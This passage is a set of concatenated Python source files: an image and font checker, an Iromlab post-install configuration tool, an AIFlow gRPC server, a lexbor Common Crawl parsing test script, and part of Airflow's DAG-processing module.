chunk = body[pos: pos + 2]
block_size = struct.unpack('2B', chunk)
pos += 2
block_size = block_size[0] * 256 + block_size[1] - 2
pos += block_size
except Exception:
logging.exception('Error scanning JPEG')
self.progressive_results[request_id] = check
except Exception:
logging.exception('Error checking progressive')
self.progressive_time = monotonic() - start
def check_fonts(self):
"""Check each request to extract metadata about fonts"""
start = monotonic()
try:
from fontTools.ttLib import TTFont
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None and sniff_type in ['OTF', 'TTF', 'WOFF', 'WOFF2']:
tables = None
ttf = TTFont(request['body'], lazy=True)
reader = ttf.reader
tags = sorted(reader.keys())
for tag in tags:
entry = reader.tables[tag]
if tables is None:
tables = {}
tables[tag] = entry.length
ttf.close()
if tables is not None:
self.font_results[request_id] = {'table_sizes': tables}
except Exception:
logging.exception('Error checking font')
except Exception:
pass
self.font_time = monotonic() - start
def get_header_value(self, headers, name):
"""Get the value for the requested header"""
value = None
if headers:
if name in headers:
value = headers[name]
else:
find = name.lower()
for header_name in headers:
check = header_name.lower()
if check == find or (check[0] == ':' and check[1:] == find):
value = headers[header_name]
break
return value
def sniff_content(self, raw_bytes):
"""Check the beginning of the file to see if it is a known image type"""
content_type = None
hex_bytes = binascii.hexlify(raw_bytes[:14])
# spell-checker: disable
if hex_bytes[0:6] == b'ffd8ff':
content_type = 'jpeg'
elif hex_bytes[0:16] == b'89504e470d0a1a0a':
content_type = 'png'
elif raw_bytes[:6] == b'GIF87a' or raw_bytes[:6] == b'GIF89a':
content_type = 'gif'
elif raw_bytes[:4] == b'RIFF' and raw_bytes[8:14] == b'WEBPVP':
content_type = 'webp'
elif raw_bytes[:4] == b'OTTO':
content_type = 'OTF'
elif raw_bytes[:4] == b'ttcf':
content_type = 'TTF'
elif raw_bytes[:4] == b'wOFF':
content_type = 'WOFF'
elif raw_bytes[:4] == b'wOF2':
content_type = 'WOFF2'
# spell-checker: enable
return content_type
def sniff_file_content(self, image_file):
"""Sniff the content type from a file"""
content_type = None
with open(image_file, 'rb') as f_in:
raw = f_in.read(14)
content_type = self.sniff_content(raw)
return content_type
|
configure.pyw
|
#! /usr/bin/env python
"""Post-install / configuration script for Iromlab"""
import os
import sys
import imp
import site
import sysconfig
from shutil import copyfile
import threading
import logging
import pythoncom
from win32com.client import Dispatch
try:
import tkinter as tk # Python 3.x
import tkinter.scrolledtext as ScrolledText
import tkinter.messagebox as tkMessageBox
except ImportError:
import Tkinter as tk # Python 2.x
import ScrolledText
import tkMessageBox
def errorExit(error):
"""Show error message in messagebox and then exit after userv presses OK"""
tkMessageBox.showerror("Error", error)
os._exit(0)
def get_reg(name, path):
"""Read variable from Windows Registry"""
import winreg
# From http://stackoverflow.com/a/35286642
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
def main_is_frozen():
return (hasattr(sys, "frozen") or # new py2exe
hasattr(sys, "importers") # old py2exe
or imp.is_frozen("__main__")) # tools/freeze
def get_main_dir():
if main_is_frozen():
return os.path.dirname(sys.executable)
return os.path.dirname(sys.argv[0])
def post_install():
"""Install config file + pre-packaged tools to user dir +
Create a Desktop shortcut to the installed software
"""
# This is needed to avoid 'CoInitialize has not been called'
# error with Dispatch. See: https://stackoverflow.com/a/26753031
pythoncom.CoInitialize()
# Package name
packageName = 'iromlab'
# Scripts directory (location of launcher script)
scriptsDir = get_main_dir()
logging.info("Scripts directory: " + scriptsDir)
# Package directory (parent of scriptsDir)
packageDir = os.path.abspath(os.path.join(scriptsDir, os.pardir))
logging.info("Package directory: " + packageDir)
# Part 1: install config file
# Locate Windows user directory
userDir = os.path.expanduser('~')
# Config directory
configDirUser = os.path.join(userDir, packageName)
logging.info("User configuration directory: " + configDirUser)
# Create config directory if it doesn't exist
if not os.path.isdir(configDirUser):
logging.info("Creating user configuration directory ...")
try:
os.makedirs(configDirUser)
logging.info("Done!")
except IOError:
msg = 'could not create configuration directory'
errorExit(msg)
# Config file name
configFileUser = os.path.join(configDirUser, 'config.xml')
if not os.path.isfile(configFileUser):
        # No config file in user dir, so copy it from its location in the package.
        # The location is /iromlab/conf/config.xml in the 'site-packages' directory
        # (if installed with pip).
logging.info("Copying configuration file to user directory ...")
# Locate global site-packages dir (this returns multiple entries)
sitePackageDirsGlobal = site.getsitepackages()
# Assumptions: site package dir is called 'site-packages' and is
# unique (?)
for directory in sitePackageDirsGlobal:
if 'site-packages' in directory:
sitePackageDirGlobal = directory
try:
logging.info("Global site package directory: " + sitePackageDirGlobal)
except:
pass
# Locate user site-packages dir
sitePackageDirUser = site.getusersitepackages()
logging.info("User site package directory: " + sitePackageDirUser)
# Determine which site package dir to use
        # Compare in lowercase because site.getsitepackages() sometimes
        # returns lowercase paths (observed with Python 3.7 on Windows 10)
if packageDir.lower() in sitePackageDirGlobal.lower():
sitePackageDir = sitePackageDirGlobal
elif packageDir.lower() in sitePackageDirUser.lower():
sitePackageDir = sitePackageDirUser
else:
msg = 'could not establish package dir to use'
errorExit(msg)
logging.info("Site package directory: " + sitePackageDir)
# Construct path to config file
configFilePackage = os.path.join(sitePackageDir, packageName,
'conf', 'config.xml')
if os.path.isfile(configFilePackage):
try:
copyfile(configFilePackage, configFileUser)
logging.info("Done!")
except IOError:
msg = 'could not copy configuration file to ' + configFileUser
errorExit(msg)
# This should never happen but who knows ...
else:
msg = 'no configuration file found in package'
errorExit(msg)
# Part 2: create Desktop shortcut
logging.info("Creating desktop shortcut ...")
try:
# Target of shortcut
target = os.path.join(scriptsDir, packageName + '.exe')
# Name of link file
linkName = packageName + '.lnk'
# Read location of Windows desktop folder from registry
regName = 'Desktop'
regPath = r'Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
desktopFolder = os.path.normpath(get_reg(regName, regPath))
logging.info("Desktop directory: " + desktopFolder)
# Path to location of link file
pathLink = os.path.join(desktopFolder, linkName)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(pathLink)
shortcut.Targetpath = target
shortcut.WorkingDirectory = scriptsDir
shortcut.IconLocation = target
shortcut.save()
logging.info("Done!")
except Exception:
msg = 'Failed to create desktop shortcut'
errorExit(msg)
msg = 'Iromlab configuration completed successfully, click OK to exit!'
tkMessageBox.showinfo("Info", msg)
os._exit(0)
class TextHandler(logging.Handler):
"""This class allows you to log to a Tkinter Text or ScrolledText widget
Adapted from Moshe Kaplan:
https://gist.github.com/moshekaplan/c425f861de7bbf28ef06
"""
def __init__(self, text):
# run the regular Handler __init__
logging.Handler.__init__(self)
# Store a reference to the Text it will log to
self.text = text
def emit(self, record):
msg = self.format(record)
def append():
self.text.configure(state='normal')
self.text.insert(tk.END, msg + '\n')
self.text.configure(state='disabled')
# Autoscroll to the bottom
self.text.yview(tk.END)
# This is necessary because we can't modify the Text from other threads
self.text.after(0, append)
class myGUI(tk.Frame):
"""This class defines the graphical user interface"""
def __init__(self, parent, *args, **kwargs):
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
self.build_gui()
def build_gui(self):
# Build GUI
self.root.title('Iromlab Configuration Tool')
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='ew')
self.grid_columnconfigure(0, weight=1, uniform='a')
self.grid_columnconfigure(1, weight=1, uniform='a')
self.grid_columnconfigure(2, weight=1, uniform='a')
self.grid_columnconfigure(3, weight=1, uniform='a')
# Add text widget to display logging info
st = ScrolledText.ScrolledText(self, state='disabled')
st.configure(font='TkFixedFont')
st.grid(column=0, row=1, sticky='w', columnspan=4)
# Create textLogger
text_handler = TextHandler(st)
# Logging configuration
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
logger = logging.getLogger()
logger.addHandler(text_handler)
def main():
"""Main function"""
root = tk.Tk()
myGUI(root)
t1 = threading.Thread(target=post_install, args=[])
t1.start()
root.mainloop()
t1.join()
if __name__ == "__main__":
main()
|
server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import asyncio
import functools
import inspect
import logging
import os
import sys
import tempfile
import threading
import time
from concurrent import futures
from typing import Dict
import grpc
from grpc import _common, _server
from grpc._cython.cygrpc import StatusCode
from grpc._server import _serialize_response, _status, _abort, _Context, _unary_request, \
_select_thread_pool_for_behavior, _unary_response_in_pool
from ai_flow.endpoint.server.high_availability import SimpleAIFlowServerHaManager, HighAvailableService
from ai_flow.endpoint.server.server_config import DBType
from ai_flow.metadata_store.service.service import MetadataService
from ai_flow.metric.service.metric_service import MetricService
from ai_flow.model_center.service.service import ModelCenterService
from ai_flow.protobuf.high_availability_pb2_grpc import add_HighAvailabilityManagerServicer_to_server
from ai_flow.scheduler_service.service.service import SchedulerService, SchedulerServiceConfig
from ai_flow.store.db.base_model import base
from ai_flow.store.db.db_util import extract_db_engine_from_uri, create_db_store
from ai_flow.store.mongo_store import MongoStoreConnManager
from ai_flow.store.sqlalchemy_store import SqlAlchemyStore
from ai_flow.util import sqlalchemy_db
from notification_service.proto import notification_service_pb2_grpc
from notification_service.service import NotificationService
sys.path.append(os.path.abspath(os.path.join(os.getcwd(), "../../..")))
from ai_flow.protobuf import model_center_service_pb2_grpc, \
metadata_service_pb2_grpc, metric_service_pb2_grpc, scheduling_service_pb2_grpc
_PORT = '50051'
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
class AIFlowServer(object):
"""
    Blocking/async server for an AIFlow REST endpoint that provides the metadata, model and notification services.
"""
def __init__(self,
store_uri=None,
port=_PORT,
notification_server_uri=None,
start_meta_service: bool = True,
start_model_center_service: bool = True,
start_metric_service: bool = True,
start_scheduler_service: bool = True,
scheduler_service_config: Dict = None,
enabled_ha: bool = False,
ha_manager=None,
ha_server_uri=None,
ha_storage=None,
ttl_ms: int = 10000):
self.store_uri = store_uri
self.db_type = DBType.value_of(extract_db_engine_from_uri(store_uri))
self.executor = Executor(futures.ThreadPoolExecutor(max_workers=10))
self.server = grpc.server(self.executor)
self.enabled_ha = enabled_ha
self.start_scheduler_service = start_scheduler_service
server_uri = 'localhost:{}'.format(port)
if start_model_center_service:
logging.info("start model center service.")
model_center_service_pb2_grpc.add_ModelCenterServiceServicer_to_server(
ModelCenterService(store_uri=store_uri,
notification_server_uri=notification_server_uri),
self.server)
if start_meta_service:
logging.info("start meta service.")
metadata_service_pb2_grpc.add_MetadataServiceServicer_to_server(
MetadataService(db_uri=store_uri, server_uri=server_uri), self.server)
if start_metric_service:
logging.info("start metric service.")
metric_service_pb2_grpc.add_MetricServiceServicer_to_server(MetricService(db_uri=store_uri), self.server)
if start_scheduler_service:
self._add_scheduler_service(scheduler_service_config, store_uri, notification_server_uri)
if enabled_ha:
self._add_ha_service(ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms)
self.server.add_insecure_port('[::]:' + str(port))
self._stop = threading.Event()
def _add_scheduler_service(self, scheduler_service_config, db_uri, notification_server_uri):
logging.info("start scheduler service.")
real_config = SchedulerServiceConfig(scheduler_service_config)
self.scheduler_service = SchedulerService(real_config, db_uri, notification_server_uri)
scheduling_service_pb2_grpc.add_SchedulingServiceServicer_to_server(self.scheduler_service,
self.server)
def _add_ha_service(self, ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms):
if ha_manager is None:
ha_manager = SimpleAIFlowServerHaManager()
if ha_server_uri is None:
raise ValueError("ha_server_uri is required with ha enabled!")
if ha_storage is None:
ha_storage = create_db_store(store_uri)
self.ha_service = HighAvailableService(ha_manager, ha_server_uri, ha_storage, ttl_ms)
add_HighAvailabilityManagerServicer_to_server(self.ha_service, self.server)
def run(self, is_block=False):
if self.enabled_ha:
self.ha_service.start()
self.server.start()
if self.start_scheduler_service:
self.scheduler_service.start()
logging.info('AIFlow server started.')
if is_block:
try:
while not self._stop.is_set():
self._stop.wait(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
logging.info("received KeyboardInterrupt")
self.stop()
else:
pass
def stop(self, clear_sql_lite_db_file=False):
logging.info("stopping AIFlow server")
if self.start_scheduler_service:
self.scheduler_service.stop()
self.server.stop(0)
if self.enabled_ha:
self.ha_service.stop()
self.executor.shutdown()
if self.db_type == DBType.SQLITE and clear_sql_lite_db_file:
sqlalchemy_db.clear_db(self.store_uri, base.metadata)
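            # Strip the 10-character 'sqlite:///' prefix to get the on-disk db file path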
os.remove(self.store_uri[10:])
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().disconnect_all()
self._stop.set()
logging.info('AIFlow server stopped.')
def _clear_db(self):
if self.db_type == DBType.SQLITE:
sqlalchemy_db.reset_db(self.store_uri, base.metadata)
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().drop_all()
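# _loop and Executor below bridge grpc's thread-pool based server with an asyncio event
# loop: the loop runs in a dedicated daemon thread so coroutine servicer methods can be
# scheduled on it, while plain callables keep using the wrapped thread pool.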
def _loop(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
if not loop.is_running() or loop.is_closed():
loop.run_forever()
pending = asyncio.all_tasks(loop=loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
class Executor(futures.Executor):
def __init__(self, thread_pool, loop=None):
super().__init__()
self._shutdown = False
self._thread_pool = thread_pool
self._loop = loop or asyncio.get_event_loop()
if not self._loop.is_running() or self._loop.is_closed():
self._thread = threading.Thread(target=_loop, args=(self._loop,), daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown.')
if not self._loop.is_running():
raise RuntimeError('Loop must be started before any function could be submitted.')
if inspect.iscoroutinefunction(fn):
coroutine = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coroutine, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(self._thread_pool, func)
def shutdown(self, wait=True):
self._shutdown = True
if wait:
self._thread_pool.shutdown()
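# The helpers below mirror grpc._server's internal unary-unary handling so that
# 'async def' servicer methods are awaited on the event loop instead of being
# called synchronously.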
async def _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e:
with state.condition_type:
if e not in state.rpc_errors:
logging.exception(e)
_abort(state, rpc_event.operation_call, StatusCode.unknown, _common.encode(e))
return None, False
async def _unary_response_in_pool_async(rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _handle_unary_unary(rpc_event, state, method_handler, default_thread_pool):
unary_request = _unary_request(rpc_event, state, method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.unary_unary, default_thread_pool)
if asyncio.iscoroutinefunction(method_handler.unary_unary):
return thread_pool.submit(_unary_response_in_pool_async, rpc_event, state, method_handler.unary_unary,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
else:
return thread_pool.submit(_unary_response_in_pool, rpc_event, state, method_handler.unary_unary, unary_request,
method_handler.request_deserializer, method_handler.response_serializer)
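# Replace grpc's built-in unary-unary handler with the coroutine-aware version above.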
_server._handle_unary_unary = _handle_unary_unary
if __name__ == '__main__':
fd, temp_db_file = tempfile.mkstemp()
os.close(fd)
store_uri = '%s%s' % ('sqlite:///', temp_db_file)
server = AIFlowServer(store_uri=store_uri)
server.run(is_block=True)
|
commoncrawl.py
|
# coding: utf-8
import getopt, sys, os, stat, subprocess
from multiprocessing import Process
import warc
cmd_wget = ["wget", "-q"]
cmp_unzip = ["gzip", "-qq", "-d"]
commoncrawl_url = "https://commoncrawl.s3.amazonaws.com"
def run_test(file_list, bin_parser, save_to = ".", threads_count = 10):
f = open(file_list, "r")
for line in f:
url = ("%s/%s" % (commoncrawl_url, line)).strip()
print("Begin download: " + url)
cmd_wget.append(url)
proc = subprocess.run(cmd_wget)
del cmd_wget[-1]
if proc.returncode:
continue
warc_filename = os.path.basename(url)
print("Unzip file: " + warc_filename)
cmp_unzip.append(warc_filename)
proc = subprocess.run(cmp_unzip)
del cmp_unzip[-1]
if proc.returncode:
os.remove(warc_filename)
continue
orig_filename = os.path.splitext(warc_filename)[0]
print("Begin process:" + orig_filename)
parsed = process_warc(threads_count, bin_parser, orig_filename, url, save_to)
print("Total parsed: %s" % parsed)
os.remove(orig_filename)
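# Iterate the WARC records, split each HTTP payload into header and HTML body, and feed
# every body to the parser binary in its own process; processes are joined in batches of
# threads_count.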
def process_warc(threads_count, bin_parser, file_name, base_url, save_to = "."):
warc_file = warc.open(file_name, 'rb')
plist = []
parsed = 0
for idx, record in enumerate(warc_file):
url = record.url
if not url:
continue
payload = record.payload.read()
header, html = payload.split(b'\r\n\r\n', maxsplit=1)
if url and html:
plist.append(Process(target=read_doc, args=[bin_parser, save_to, base_url, idx, html]))
plist[-1].start()
parsed += 1
if (idx % 100) == 0:
print("%s" % idx)
if len(plist) == threads_count:
for p in plist:
p.join()
plist = []
for p in plist:
p.join()
warc_file.close()
return parsed
def read_doc(bin_parser, save_to, base_url, idx, html):
parser = subprocess.Popen([bin_parser], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
parser.stdin.write(html)
parser.stdin.close()
rdata = parser.stdout.read()
parser.stdout.close()
parser.wait()
if parser.returncode != 0:
fp_base = os.path.basename(base_url)
filename = "%s-%s-%s.errlog" % (os.path.splitext(fp_base)[0], save_to, idx)
f = open(os.path.normpath(filename), 'wb')
f.write(html)
f.close()
return len(html), len(rdata), parser.returncode
if __name__ == "__main__":
run_test(file_list = "warc.paths",
bin_parser = "../../build/test/lexbor/html/lexbor_html_commoncrawl",
save_to = ".", threads_count = 30)
|
dag_processing.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import enum
import importlib
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
from typing import Iterable, NamedTuple, Optional
import psutil
from setproctitle import setproctitle
from sqlalchemy import or_
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.models import errors
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.db import provide_session
from airflow.utils.helpers import reap_process_group
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.state import State
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
def __init__(self, dag, pickle_id=None):
self._dag_id = dag.dag_id
self._task_ids = [task.task_id for task in dag.tasks]
self._full_filepath = dag.full_filepath
self._is_paused = dag.is_paused
self._concurrency = dag.concurrency
self._pickle_id = pickle_id
self._task_special_args = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if len(special_args) > 0:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self):
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self):
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self):
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self):
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self):
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self):
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self):
return self._task_special_args
def get_task_special_arg(self, task_id, special_arg_name):
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleTaskInstance:
def __init__(self, ti):
self._dag_id = ti.dag_id
self._task_id = ti.task_id
self._execution_date = ti.execution_date
self._start_date = ti.start_date
self._end_date = ti.end_date
self._try_number = ti.try_number
self._state = ti.state
self._executor_config = ti.executor_config
if hasattr(ti, 'run_as_user'):
self._run_as_user = ti.run_as_user
else:
self._run_as_user = None
if hasattr(ti, 'pool'):
self._pool = ti.pool
else:
self._pool = None
if hasattr(ti, 'priority_weight'):
self._priority_weight = ti.priority_weight
else:
self._priority_weight = None
self._queue = ti.queue
self._key = ti.key
@property
def dag_id(self):
return self._dag_id
@property
def task_id(self):
return self._task_id
@property
def execution_date(self):
return self._execution_date
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def try_number(self):
return self._try_number
@property
def state(self):
return self._state
@property
def pool(self):
return self._pool
@property
def priority_weight(self):
return self._priority_weight
@property
def queue(self):
return self._queue
@property
def key(self):
return self._key
@property
def executor_config(self):
return self._executor_config
@provide_session
def construct_task_instance(self, session=None, lock_for_update=False):
"""
Construct a TaskInstance from the database based on the primary key
:param session: DB session.
:param lock_for_update: if True, indicates that the database should
lock the TaskInstance (issuing a FOR UPDATE clause) until the
session is committed.
"""
TI = airflow.models.TaskInstance
qry = session.query(TI).filter(
TI.dag_id == self._dag_id,
TI.task_id == self._task_id,
TI.execution_date == self._execution_date)
if lock_for_update:
ti = qry.with_for_update().first()
else:
ti = qry.first()
return ti
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags):
"""
Constructor.
        :param simple_dags: SimpleDag objects that should be in this bag
        :type simple_dags: list[airflow.utils.dag_processing.SimpleDag]
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self):
"""
        :return: IDs of all the DAGs in this bag
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id):
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
def correct_maybe_zipped(fileloc):
"""
If the path contains a folder with a .zip suffix, then
the folder is treated as a zip archive and path to zip is returned.
"""
_, archive, _ = re.search(r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc).groups()
if archive and zipfile.is_zipfile(archive):
return archive
else:
return fileloc
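# Strips trailing '#' comments from .airflowignore lines before they are compiled
# as regexes in list_py_file_paths() below.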
COMMENT_PATTERN = re.compile(r"\s*#.*")
def list_py_file_paths(directory, safe_mode=conf.getboolean('core', 'DAG_DISCOVERY_SAFE_MODE', fallback=True),
include_examples=None):
"""
Traverse a directory and look for Python files.
:param directory: the directory to traverse
:type directory: unicode
:param safe_mode: whether to use a heuristic to determine whether a file
contains Airflow DAG definitions. If not provided, use the
core.DAG_DISCOVERY_SAFE_MODE configuration setting. If not set, default
to safe.
:type safe_mode: bool
:param include_examples: include example DAGs
:type include_examples: bool
:return: a list of paths to Python files in the specified directory
:rtype: list[unicode]
"""
if include_examples is None:
include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
file_paths = []
if directory is None:
return []
elif os.path.isfile(directory):
return [directory]
elif os.path.isdir(directory):
patterns_by_dir = {}
for root, dirs, files in os.walk(directory, followlinks=True):
patterns = patterns_by_dir.get(root, [])
ignore_file = os.path.join(root, '.airflowignore')
if os.path.isfile(ignore_file):
with open(ignore_file, 'r') as file:
# If we have new patterns create a copy so we don't change
# the previous list (which would affect other subdirs)
lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in file.read().split("\n")]
patterns += [re.compile(line) for line in lines_no_comments if line]
# If we can ignore any subdirs entirely we should - fewer paths
# to walk is better. We have to modify the ``dirs`` array in
# place for this to affect os.walk
dirs[:] = [
d
for d in dirs
if not any(p.search(os.path.join(root, d)) for p in patterns)
]
# We want patterns defined in a parent folder's .airflowignore to
# apply to subdirs too
for d in dirs:
patterns_by_dir[os.path.join(root, d)] = patterns
for f in files:
try:
file_path = os.path.join(root, f)
if not os.path.isfile(file_path):
continue
_, file_ext = os.path.splitext(os.path.split(file_path)[-1])
if file_ext != '.py' and not zipfile.is_zipfile(file_path):
continue
if any([re.findall(p, file_path) for p in patterns]):
continue
# Heuristic that guesses whether a Python file contains an
# Airflow DAG definition.
might_contain_dag = True
if safe_mode and not zipfile.is_zipfile(file_path):
with open(file_path, 'rb') as fp:
content = fp.read()
might_contain_dag = all(
[s in content for s in (b'DAG', b'airflow')])
if not might_contain_dag:
continue
file_paths.append(file_path)
except Exception:
log = LoggingMixin().log
log.exception("Error while examining %s", f)
if include_examples:
import airflow.example_dags
example_dag_folder = airflow.example_dags.__path__[0]
file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
return file_paths
class AbstractDagFileProcessor(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self):
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self):
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file()
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
DagParsingStat = NamedTuple('DagParsingStat', [
('file_paths', Iterable[str]),
('done', bool),
('all_files_processed', bool)
])
DagFileStat = NamedTuple('DagFileStat', [
('num_dags', int),
('import_errors', int),
('last_finish_time', datetime),
('last_duration', float),
('run_count', int),
])
class DagParsingSignal(enum.Enum):
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
    Agent for DAG file processing. It is responsible for all DAG parsing
    related jobs in the scheduler process. Mainly it spins up DagFileProcessorManager
    in a subprocess, collects DAG parsing results from it and exchanges
    signals and DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
        Should only be used when the DAG file processor manager was launched in sync mode.
